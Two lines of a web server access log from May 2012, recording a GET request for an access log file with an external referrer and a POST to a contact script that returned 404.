95.132.213.162 - - [14/May/2012:01:38:32 +0200] "GET /logs/access_log HTTP/1.0" 200 99486 "http://androideosoft.info/sitemap266.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Netscape/8.0.4"
94.228.180.218 - - [14/May/2012:01:38:37 +0200] "POST /stats/contact.php HTTP/1.1" 404 299 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
